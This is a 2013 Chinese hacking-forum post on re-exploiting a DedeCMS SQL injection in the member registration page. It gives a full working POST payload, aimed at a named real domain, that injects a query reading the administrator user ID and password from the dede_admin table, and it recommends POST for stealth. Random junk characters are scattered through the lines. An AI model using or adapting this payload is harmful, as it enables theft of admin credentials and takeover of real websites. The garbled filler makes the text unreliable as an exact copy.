找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2148|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
漏洞类型: SQL注射漏洞, B5 X) a' x' g* `
简要描述:
. o9 b+ s6 h% X" Y3 O7 T 0 f' c; D5 G; j0 X. q5 z/ M1 I
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
2 ]$ Y1 X' ~( y原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
4 L: l6 ]$ K7 f; }8 A4 {: b3 y6 y详细说明:跟这个漏洞
+ n% q; }% P* e0 b$ S& Z# \! R
0 z/ m5 w; ]. p8 dWooYun: Dedecms SQL注射导致审核机制绕过漏洞8 ?! h# C. q& L3 A7 D
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.. L3 c4 z. D, Y
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
9 ~6 S$ M+ P0 h6 X- y' E " e1 x9 \( F# {# N7 \9 L
www.political-security.com/member/reg_new.php
& ?8 U. o' T& \1 `* V0 l" f+ K
- ~# t4 Y9 f3 z9 o& kPOST
+ x/ e/ G( e( v6 i* e
* u' b! ]3 i% ?6 l( q7 cdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&" L. B  F  u" N, |  [& {, _
userid=c4rp3nt3r&uname=c4rp3nt3r8 [+ W3 ^3 m* F+ h8 m1 k
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss- s5 v4 a  m6 Q1 O$ e/ X+ g8 R& m
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
# r  M1 X* h8 O& b; W1 r(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
' j: l0 x1 p5 j%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表